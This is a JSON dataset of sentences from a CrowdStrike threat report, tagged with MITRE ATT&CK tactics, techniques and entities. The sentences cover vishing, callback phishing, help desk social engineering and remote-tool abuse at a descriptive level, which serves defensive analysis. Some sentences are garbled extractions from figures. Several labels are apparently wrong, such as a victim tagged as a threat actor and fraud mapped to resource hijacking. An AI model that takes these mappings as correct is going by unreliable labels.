payloads, initiate remote support sessions, or submit credentials to adversary-in-the-middle phishing pages.", "entities": [ { "text": "threat actors", "start": 64, "end": 77, "label": "ThreatActor" }, { "text": "call targeted users", "start": 78, "end": 97, "label": "Action" }, { "text": "attempt to persuade them to download malicious payloads", "start": 102, "end": 157, "label": "Action" }, { "text": "establish remote support sessions", "start": 159, "end": 192, "label": "Action" }, { "text": "enter their credentials to adversary-in-the-middle (AITM)\nphishing pages", "start": 197, "end": 269, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s117-46993a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 117, "context_before": "OCT NOV DEC 442% Increase, H1 vs. H2 2024 In vishing campaigns, threat actors call targeted users and attempt to persuade them to download malicious payloads, establish remote support sessions, or enter their credentials to adversary-in-the-middle (AITM)\nphishing pages.", "sentence_text": "In many cases, calls were made via Microsoft Teams from external tenants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s118-881629", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 118, "context_before": "In many cases, calls were made via Microsoft Teams from external tenants.", "sentence_text": "At least four of these campaigns leveraged spam bombing — sending thousands of spam emails to targeted users’ email addresses — as a pretext for the vishing call.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "Threat actors use spam bombing by sending thousands of emails to targeted users as a pretext to initiate vishing calls.", "entities": [ { "text": "campaigns", "start": 23, "end": 32, "label": "ThreatActor" }, { "text": "leveraged spam bombing", "start": 33, "end": 55, "label": "Action" }, { "text": "sending thousands of spam emails to targeted users’ email addresses", "start": 58, "end": 125, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s119-09e79b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 119, "context_before": "At least four of these campaigns leveraged spam bombing — sending thousands of spam emails to targeted users’ email addresses — as a pretext for the vishing call.", "sentence_text": "The CrowdStrike Falcon® Complete Next-Gen MDR and CrowdStrike OverWatch teams observed a significant increase in these campaigns in the second half of 2024, detecting several relevant intrusions each day.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s120-f49cee", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 120, "context_before": "The CrowdStrike Falcon® Complete Next-Gen MDR and CrowdStrike OverWatch teams observed a significant increase in these campaigns in the second half of 2024, detecting several relevant intrusions each day.", "sentence_text": "eCrime adversary CURLY SPIDER is behind one of these campaigns, with relevant intrusions culminating in Black Basta ransomware deployment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s121-ed80a9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 121, "context_before": "eCrime adversary CURLY SPIDER is behind one of these campaigns, with relevant intrusions culminating in Black Basta ransomware deployment.", "sentence_text": "The long-standing Russia-based eCrime adversary CHATTY SPIDER continued to employ callback phishing as an initial access vector in data theft and extortion campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.004", "name": "Phishing: Spearphishing Voice (Callback Phishing)" } ], "procedure": "CHATTY SPIDER uses callback phishing as an initial access vector in data theft and extortion campaigns.", "entities": [ { "text": "CHATTY SPIDER", "start": 48, "end": 61, "label": "ThreatActor" }, { "text": "employ callback phishing", "start": 75, "end": 99, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s122-06f07e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 122, "context_before": "The long-standing Russia-based eCrime adversary CHATTY SPIDER continued to employ callback phishing as an initial access vector in data theft and extortion campaigns.", "sentence_text": "In callback phishing, threat actors typically begin by sending a lure email to targeted users, often regarding an imminent charge or overdue payment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s123-d9a7c1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 123, "context_before": "In callback phishing, threat actors typically begin by sending a lure email to targeted users, often regarding an imminent charge or overdue payment.", "sentence_text": "This prompts users to initiate a phone interaction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s124-8c247f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 124, "context_before": "This prompts users to initiate a phone interaction.", "sentence_text": "CHATTY SPIDER primarily targets the legal and insurance sectors and has demanded ransoms up to 8 million USD.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s125-e7c1de", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 125, "context_before": "CHATTY SPIDER primarily targets the legal and insurance sectors and has demanded ransoms up to 8 million USD.", "sentence_text": "Several eCrime actors used callback phishing to gain initial access in 2024, including one campaign that used it to install a remote support tool.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566.004", "name": "Phishing: Spearphishing Voice (Callback Phishing)" }, { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "ECrime actors use callback phishing to gain initial access and in some cases install remote support tools during campaigns.", "entities": [ { "text": "eCrime actors", "start": 8, "end": 21, "label": "ThreatActor" }, { "text": "used callback phishing", "start": 22, "end": 44, "label": "Action" }, { "text": "install a remote support tool", "start": 116, "end": 145, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s126-8160ac", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 126, "context_before": "Several eCrime actors used callback phishing to gain initial access in 2024, including one campaign that used it to install a remote support tool.", "sentence_text": "Brazil-based eCrime adversary PLUMP SPIDER exclusively targeted Brazil-based organizations throughout 2024 with attempts to conduct wire fraud.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s127-82f0a2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 127, "context_before": "Brazil-based eCrime adversary PLUMP SPIDER exclusively targeted Brazil-based organizations throughout 2024 with attempts to conduct wire fraud.", "sentence_text": "PLUMP SPIDER uses vishing calls to direct targeted users to sites hosting remote support and RMM tools such as RustDesk and Supremo.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566.004", "name": "Phishing: Spearphishing Voice (Callback Phishing)" }, { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "PLUMP SPIDER uses vishing calls to direct victims to sites hosting remote support and RMM tools such as RustDesk and Supremo.", "entities": [ { "text": "PLUMP SPIDER", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "uses vishing calls", "start": 13, "end": 31, "label": "Action" }, { "text": "direct targeted users to sites hosting remote support and RMM tools", "start": 35, "end": 102, "label": "Action" }, { "text": "RustDesk", "start": 111, "end": 119, "label": "MalwareTool" }, { "text": "Supremo", "start": 124, "end": 131, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s128-e2591e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 128, "context_before": "PLUMP SPIDER uses vishing calls to direct targeted users to sites hosting remote support and RMM tools such as RustDesk and Supremo.", "sentence_text": "After gaining access, they compromise the victim’s payment systems to perform fraudulent financial transfers.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "After gaining access, PLUMP SPIDER compromises victim payment systems to perform fraudulent financial transfers.", "entities": [ { "text": "they", "start": 22, "end": 26, "label": "ThreatActor" }, { "text": "compromise the victim’s payment systems", "start": 27, "end": 66, "label": "Action" }, { "text": "fraudulent financial transfers", "start": 78, "end": 108, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p16-s129-636d2d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 16, "sentence_id": 129, "context_before": "After gaining access, they compromise the victim’s payment systems to perform fraudulent financial transfers.", "sentence_text": "In addition to targeting unwitting users, the adversary has reportedly attempted to recruit insiders at targeted organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" }, { "id": "T1200", "name": "Hardware Additions" } ], "procedure": "The adversary attempts to recruit insiders within targeted organizations as part of their intrusion activities.", "entities": [ { "text": "the adversary", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "attempted to recruit insiders", "start": 71, "end": 100, "label": "Action" }, { "text": "targeted organizations", "start": 104, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p17-s130-bfde35", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 17, "sentence_id": 130, "context_before": "In addition to targeting unwitting users, the adversary has reportedly attempted to recruit insiders at targeted organizations.", "sentence_text": "CURLY SPIDER CHATTY SPIDER", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p17-s131-e5c0f8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 17, "sentence_id": 131, "context_before": "CURLY SPIDER CHATTY SPIDER", "sentence_text": "PLUMP SPIDER STEP 1 CURLY SPIDERthe victimspam bombs CHATTYemailSPIDERto thesendsvictimphishing CURLY SPIDER calls the PLUMP SPIDER calls the Victim calls in response to victim posing as IT support victim posing as IT supportSTEP 2 CHATTY SPIDER's email (vishing) (vishing)", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.004", "name": "Phishing: Spearphishing Voice (Callback Phishing)" } ], "procedure": "Multiple adversaries (CURLY SPIDER, CHATTY SPIDER, PLUMP SPIDER) conduct spam bombing and phishing/vishing steps where victims are contacted and manipulated into responding to attackers posing as IT support.", "entities": [ { "text": "CURLY SPIDER", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "CHATTY SPIDER", "start": 232, "end": 245, "label": "ThreatActor" }, { "text": "PLUMP SPIDER", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "spam bombs", "start": 42, "end": 52, "label": "Action" }, { "text": "sends", "start": 76, "end": 81, "label": "Action" }, { "text": "calls the Victim", "start": 132, "end": 148, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p17-s132-059a55", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 17, "sentence_id": 132, "context_before": "PLUMP SPIDER STEP 1 CURLY SPIDERthe victimspam bombs CHATTYemailSPIDERto thesendsvictimphishing CURLY SPIDER calls the PLUMP SPIDER calls the Victim calls in response to victim posing as IT support victim posing as IT supportSTEP 2 CHATTY SPIDER's email (vishing) (vishing)", "sentence_text": "Victim downloads RMM tool, providing these adversaries with access Quick Access, TeamViewer Zoho Assist, Atera, SoftEther VPN, Ammyy Admin, SuperOps, Syncro DWAgent, HopToDesk, RustDesk, Supremo, TeamViewer STEP 3 credentialsPLUMP SPIDERfromobtainsthe victimvalid CURLY SPIDER deploys tools CHATTY SPIDER downloads PLUMP SPIDER introduces for persistence, including a WinSCP and/or Rclone to theSTEP 4 reconnaissance tooling custom backdoor victim system CURLY SPIDER performs CHATTY SPIDER exfiltrates PLUMP SPIDER performs a reconnaissance, including for sensitive data to C2 fraudulent transaction fromSTEP 5 security software infrastructure victim payment system STEP 6 dataCURLYtoSPIDERC2 infrastructureexfiltrates victimCHATTYwithSPIDERextortionemailsdemandthe CURLY SPIDER provides STEP 7 otheraccessactors,to theincludingvictim toBGH adversary WANDERING SPIDER", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "Victim installs RMM tools enabling adversary access; attackers obtain credentials, deploy backdoors and reconnaissance tools, exfiltrate data to C2 infrastructure, and conduct fraudulent transactions and extortion across multiple stages.", "entities": [ { "text": "Victim", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "downloads RMM tool", "start": 7, "end": 25, "label": "Action" }, { "text": "TeamViewer Zoho Assist, Atera, SoftEther VPN, Ammyy Admin, SuperOps, Syncro DWAgent, HopToDesk, RustDesk, Supremo, TeamViewer", "start": 81, "end": 206, "label": "MalwareTool" }, { "text": "obtains", "start": 241, "end": 248, "label": "Action" }, { "text": "deploys tools", "start": 277, "end": 290, "label": "Action" }, { "text": "introduces", "start": 328, "end": 338, "label": "Action" }, { "text": "exfiltrates", "start": 491, "end": 502, "label": "Action" }, { "text": "fraudulent transaction", "start": 578, "end": 600, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s133-976e3b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 133, "context_before": "Victim downloads RMM tool, providing these adversaries with access Quick Access, TeamViewer Zoho Assist, Atera, SoftEther VPN, Ammyy Admin, SuperOps, Syncro DWAgent, HopToDesk, RustDesk, Supremo, TeamViewer STEP 3 credentialsPLUMP SPIDERfromobtainsthe victimvalid CURLY SPIDER deploys tools CHATTY SPIDER downloads PLUMP SPIDER introduces for persistence, including a WinSCP and/or Rclone to theSTEP 4 reconnaissance tooling custom backdoor victim system CURLY SPIDER performs CHATTY SPIDER exfiltrates PLUMP SPIDER performs a reconnaissance, including for sensitive data to C2 fraudulent transaction fromSTEP 5 security software infrastructure victim payment system STEP 6 dataCURLYtoSPIDERC2 infrastructureexfiltrates victimCHATTYwithSPIDERextortionemailsdemandthe CURLY SPIDER provides STEP 7 otheraccessactors,to theincludingvictim toBGH adversary WANDERING SPIDER", "sentence_text": "Help Desk Social Engineering In addition to vishing, multiple eCrime threat actors are increasingly adopting help desk social engineering tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s134-8ec32b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 134, "context_before": "Help Desk Social Engineering In addition to vishing, multiple eCrime threat actors are increasingly adopting help desk social engineering tactics.", "sentence_text": "Since early 2023, SCATTERED SPIDER has used this technique to gain access to single sign-on (SSO) accounts and cloud-based application suites.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1110", "name": "Brute Force" } ], "procedure": "SCATTERED SPIDER uses help desk social engineering to gain access to SSO accounts and cloud-based application suites.", "entities": [ { "text": "SCATTERED SPIDER", "start": 18, "end": 34, "label": "ThreatActor" }, { "text": "has used this technique", "start": 35, "end": 58, "label": "Action" }, { "text": "gain access to single sign-on (SSO) accounts", "start": 62, "end": 106, "label": "Action" }, { "text": "cloud-based application suites", "start": 111, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s135-fe17ea", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 135, "context_before": "Since early 2023, SCATTERED SPIDER has used this technique to gain access to single sign-on (SSO) accounts and cloud-based application suites.", "sentence_text": "Multiple eCrime actors adopted this technique in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s136-1c5d91", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 136, "context_before": "Multiple eCrime actors adopted this technique in 2024.", "sentence_text": "Several relevant cases targeted academic and healthcare entities; in these incidents, threat actors subsequently used the compromised identity to exfiltrate data from cloud-based software as a service (SaaS) applications or modify employee payroll data.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage Object" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "Threat actors use compromised identities to exfiltrate data from SaaS applications or modify payroll data in targeted academic and healthcare organizations.", "entities": [ { "text": "threat actors", "start": 86, "end": 99, "label": "ThreatActor" }, { "text": "used the compromised identity", "start": 113, "end": 142, "label": "Action" }, { "text": "exfiltrate data from cloud-based software as a service (SaaS) applications", "start": 146, "end": 220, "label": "Action" }, { "text": "modify employee payroll data", "start": 224, "end": 252, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s137-d170df", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 137, "context_before": "Several relevant cases targeted academic and healthcare entities; in these incidents, threat actors subsequently used the compromised identity to exfiltrate data from cloud-based software as a service (SaaS) applications or modify employee payroll data.", "sentence_text": "However, eCrime actors attempting to socially engineer help desk personnel often accurately respond to these questions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s138-8263c5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 138, "context_before": "However, eCrime actors attempting to socially engineer help desk personnel often accurately respond to these questions.", "sentence_text": "Much of this information is not necessarily privileged and can be found in public resources and social media sites.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s139-c28bf6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 139, "context_before": "Much of this information is not necessarily privileged and can be found in public resources and social media sites.", "sentence_text": "In most help desk social engineering incidents, calls were made outside the victim’s local business hours.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s140-8af4fe", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 140, "context_before": "In most help desk social engineering incidents, calls were made outside the victim’s local business hours.", "sentence_text": "This is likely because it enables the threat actor to maintain longer access to the compromised account before the legitimate owner reports suspicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s141-e850fc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 141, "context_before": "This is likely because it enables the threat actor to maintain longer access to the compromised account before the legitimate owner reports suspicious activity.", "sentence_text": "Threat actors using this technique often register their own device for MFA to enable persistent access to compromised accounts.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" }, { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "Threat actors register their own device for MFA to maintain persistent access to compromised accounts.", "entities": [ { "text": "Threat actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "register their own device for MFA", "start": 41, "end": 74, "label": "Action" }, { "text": "enable persistent access to compromised accounts", "start": 78, "end": 126, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s142-6788b2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 142, "context_before": "Threat actors using this technique often register their own device for MFA to enable persistent access to compromised accounts.", "sentence_text": "They also often manually delete emails from compromised mailboxes related to suspicious account activity or configure mail transport rules to redirect relevant emails to a folder other than the main inbox.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1070.002", "name": "Indicator Removal on Host: Clear Email Logs" }, { "id": "T1114", "name": "Email Collection" }, { "id": "T1114.003", "name": "Email Forwarding Rule" } ], "procedure": "Threat actors delete emails from compromised mailboxes and configure mail transport rules to redirect emails away from the main inbox to avoid detection.", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "manually delete emails from compromised mailboxes", "start": 16, "end": 65, "label": "Action" }, { "text": "configure mail transport rules", "start": 108, "end": 138, "label": "Action" }, { "text": "redirect relevant emails to a folder other than the main inbox", "start": 142, "end": 204, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s143-d7c8e6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 143, "context_before": "They also often manually delete emails from compromised mailboxes related to suspicious account activity or configure mail transport rules to redirect relevant emails to a folder other than the main inbox.", "sentence_text": "Over the past year, several eCrime actors have openly recruited callers on popular eCrime forums.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s144-6039e8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 144, "context_before": "Over the past year, several eCrime actors have openly recruited callers on popular eCrime forums.", "sentence_text": "The advertisements are usually for English-speaking callers with knowledge of RMM tooling and experience conducting remote sessions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s145-c1fe9f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 145, "context_before": "The advertisements are usually for English-speaking callers with knowledge of RMM tooling and experience conducting remote sessions.", "sentence_text": "Some eCrime actors have also sought effective methods for spoofing phone numbers or encrypting calls to ensure caller IDs can be edited and appear more legitimate.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1556.006", "name": "Modify Authentication Process: Multi-Factor Authentication Interception" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "eCrime actors seek methods to spoof phone numbers or encrypt calls so caller IDs appear legitimate during social engineering operations.", "entities": [ { "text": "eCrime actors", "start": 5, "end": 18, "label": "ThreatActor" }, { "text": "spoofing phone numbers", "start": 58, "end": 80, "label": "Action" }, { "text": "encrypting calls", "start": 84, "end": 100, "label": "Action" }, { "text": "caller IDs can be edited and appear more legitimate", "start": 111, "end": 162, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s146-8917e3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 146, "context_before": "Some eCrime actors have also sought effective methods for spoofing phone numbers or encrypting calls to ensure caller IDs can be edited and appear more legitimate.", "sentence_text": "This activity suggests phone-oriented social engineering will be a credible threat in 2025 as demand for these capabilities increases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p18-s147-857f6f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 18, "sentence_id": 147, "context_before": "This activity suggests phone-oriented social engineering will be a credible threat in 2025 as demand for these capabilities increases.", "sentence_text": "HOW TO MITIGATE HELP DESK SOCIAL ENGINEERING • Require video authentication with government identification for employees who call to request self-service password resets •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p19-s148-a26607", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 19, "sentence_id": 148, "context_before": "HOW TO MITIGATE HELP DESK SOCIAL ENGINEERING • Require video authentication with government identification for employees who call to request self-service password resets •", "sentence_text": "GENERATIVE ARTIFICIAL INTELLIGENCE AND THE ENTERPRISING ADVERSARY GenAI has emerged as an attractive tool for adversaries with a low barrier to entry that makes it widely accessible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p19-s149-b64af0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 19, "sentence_id": 149, "context_before": "GENERATIVE ARTIFICIAL INTELLIGENCE AND THE ENTERPRISING ADVERSARY GenAI has emerged as an attractive tool for adversaries with a low barrier to entry that makes it widely accessible.", "sentence_text": "Recent advancements in genAI have enhanced the efficacy of certain cyber operations, particularly those using social engineering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p19-s150-b28814", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 19, "sentence_id": 150, "context_before": "Recent advancements in genAI have enhanced the efficacy of certain cyber operations, particularly those using social engineering.", "sentence_text": "It will almost certainly be employed in 2025 cyber operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p19-s151-59c300", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 19, "sentence_id": 151, "context_before": "It will almost certainly be employed in 2025 cyber operations.", "sentence_text": "Adversaries increasingly adopted genAI throughout 2024, particularly in support of social engineering efforts and high-tempo IO campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p19-s152-631407", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 19, "sentence_id": 152, "context_before": "Adversaries increasingly adopted genAI throughout 2024, particularly in support of social engineering efforts and high-tempo IO campaigns.", "sentence_text": "Malicious Social Computer Network Engineering Operations • FAMOUS CHOLLIMA employed fictitious • Spam email campaign distributing Snake LinkedIn profiles with genAI-created text Keylogger likely used LLM-generated and fake profile images content • Deepfake video and voice clones enabled • Big game hunting (BGH) ransomware business email compromise (BEC) schemes operators APT INC deployed likely LLM-authored data destruction script • Studies validated effectiveness of genAI in phishing • Likely LLM-generated decoy sites used in NITRO SPIDER campaigns • China-aligned, LLM-powered Green Cicada network posted coordinated inauthentic • Actors on criminal forms discussed using behavior on social media LLMs for coding and shell commands • Russia-aligned operators used LLMs to • LLM was likely used to develop an alleged spread disinformation on social media exploit for CVE-2024-3400 • GenAI was used during Indian election • Cloud-conscious operators attempted to season to create videos and images gain access to enterprise LLMs", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s153-ec9534", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 153, "context_before": "Malicious Social Computer Network Engineering Operations • FAMOUS CHOLLIMA employed fictitious • Spam email campaign distributing Snake LinkedIn profiles with genAI-created text Keylogger likely used LLM-generated and fake profile images content • Deepfake video and voice clones enabled • Big game hunting (BGH) ransomware business email compromise (BEC) schemes operators APT INC deployed likely LLM-authored data destruction script • Studies validated effectiveness of genAI in phishing • Likely LLM-generated decoy sites used in NITRO SPIDER campaigns • China-aligned, LLM-powered Green Cicada network posted coordinated inauthentic • Actors on criminal forms discussed using behavior on social media LLMs for coding and shell commands • Russia-aligned operators used LLMs to • LLM was likely used to develop an alleged spread disinformation on social media exploit for CVE-2024-3400 • GenAI was used during Indian election • Cloud-conscious operators attempted to season to create videos and images gain access to enterprise LLMs", "sentence_text": "GenAI Supports Social Engineering LLMs and genAI models that create photorealistic imagery can generate convincing content at scale with minimal expertise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s154-01334f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 154, "context_before": "GenAI Supports Social Engineering LLMs and genAI models that create photorealistic imagery can generate convincing content at scale with minimal expertise.", "sentence_text": "These tools can support social engineering efforts or IO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s155-328849", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 155, "context_before": "These tools can support social engineering efforts or IO.", "sentence_text": "They also create fictitious LinkedIn profiles with genAI-created text and fake profile images.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Create fictitious LinkedIn profiles using generated text and fake images.", "entities": [ { "text": "create fictitious LinkedIn profiles with genAI-created text and fake profile images", "start": 10, "end": 93, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s156-947bb3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 156, "context_before": "They also create fictitious LinkedIn profiles with genAI-created text and fake profile images.", "sentence_text": "During interviews, many FAMOUS CHOLLIMA candidates provide answers likely derived from external sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s157-39c2a7", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 157, "context_before": "During interviews, many 